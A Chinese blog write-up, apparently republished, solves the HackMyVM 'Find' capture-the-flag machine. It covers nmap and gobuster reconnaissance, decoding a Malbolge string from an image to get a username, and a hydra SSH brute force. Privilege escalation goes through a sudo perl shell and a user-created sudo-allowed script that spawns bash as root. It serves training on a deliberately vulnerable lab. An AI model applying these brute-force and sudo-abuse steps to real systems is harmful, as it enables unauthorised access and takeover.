当前位置: 首页 > ai >正文

HackMyVM-Find

ai 2025/7/23 12:50:26

信息搜集

主机发现

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.137  08:00:27:d0:6b:60       PCS Systemtechnik GmbH
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 3 responded

端口扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.43.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:14 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.000085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -p22,80 192.168.43.137      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:17 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.00023s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

漏洞利用

看一下80端口有什么

image

端口扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.137 -w /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              git,html,php,txt,jpg,png,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.43.137/manual/]                                                                       
/robots.txt           (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt

image

/cat.jpg,将图片下载下载下来,发现有一串诡异的字符串

>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

找大佬wp知道了,这是Malbolge编程语言,用https://malbolge.doleczek.pl/来看一下是什么

image

这应该就是用户名了,爆破一下ssh

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.43.137 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-28 10:56:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.137:22/
[22][ssh] host: 192.168.43.137   login: missyred   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-28 10:56:14

提权

找一下有没有可以用来提权的地方

missyred@find:~$ sudo -l
[sudo] password for missyred: 
Matching Defaults entries for missyred on find:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser missyred may run the following commands on find:(kings) /usr/bin/perl
missyred@find:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
missyred:x:1001:1001::/home/missyred:/bin/bash
kings:x:1002:1006::/home/kings:/bin/bash

image

成功提权到kings

missyred@find:~$ sudo -u kings /usr/bin/perl -e ' exec "/bin/sh";'
$ id
uid=1002(kings) gid=1006(kings) groups=1006(kings),1005(kingg)

user.txt

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c

看一下哪里可以利用进行提权

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c
$ sudo -l
Matching Defaults entries for kings on find:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser kings may run the following commands on find:(ALL) NOPASSWD: /opt/boom/boom.sh

提权

kings@find:~$ cd /opt
kings@find:/opt$ ls
kings@find:/opt$
kings@find:/opt$ mkdir /opt/boom
kings@find:/opt$ cd /opt/boom
kings@find:/opt/boom$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:/opt/boom$ chmod +x /opt/boom/boom.sh
kings@find:/opt/boom$ sudo /opt/boom/boom.sh
root@find:/opt/boom# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

root@find:~# cat root.txt 
c8aaf0f3189e000006c305bbfcbeb790
http://www.xdnf.cn/news/9453.html

相关文章:

  • 一篇学习CSS的笔记
  • 数据编辑器所具备的数据整理功能​
  • Linux中的进程控制(下)
  • React从基础入门到高级实战:React 生态与工具 - 探索 React 生态中的工具和库:提升开发效率与项目质量
  • vue3+element plus 自定义组件,单列方块图形文字列表
  • python:selenium爬取网站信息
  • 外网访问可视化工具 Grafana (Linux版本)
  • 游戏中的数学计算
  • ORB-SLAM2学习笔记:ExtractorNode::DivideNode和ORBextractor::DistributeOctTree函数详解
  • SAP学习笔记 - 开发14 - 前端Fiori开发 HelloWorld
  • Linux基础指令(一)
  • 木愚科技闪亮第63届高博会 全栈式智能教育解决方案助力教学升级
  • 【容器】docker使用问题处理
  • IoT/基于NB28-A/BC28-CNV通信模组使用AT指令连接华为云IoTDA平台(HCIP-IoT实验2)
  • 打印Yolo预训练模型的所有类别及对应的id
  • 【Rust】Rust获取命令行参数以及IO操作
  • Gartner《2025 年软件工程规划指南》报告学习心得
  • ubuntu国内镜像源手动配置
  • TextIn OCR Frontend前端开源组件库发布!
  • ABP VNext + CRDT 打造实时协同编辑
  • linux中echo命令
  • 深入解析Linux死锁:原理、原因及解决方案
  • 【unity游戏开发——编辑器扩展】EditorUtility编辑器工具类实现如文件操作、进度条、弹窗等操作
  • 计算机网络学习20250528
  • (增强)基于sqlite、mysql、redis的消息存储
  • OpenCV---Canny边缘检测
  • 在 CAD C# 二次开发中,Clipper2、CGAL 和 NTS(NetTopologySuite)对比
  • 上交具身机器人的视觉运动导航!HTSCN:融合空间记忆与语义推理认知的导航策略
  • 11.14 LangGraph检查点系统实战:AI Agent会话恢复率提升287%的企业级方案
  • cuda编程笔记(2)--传递参数、设备属性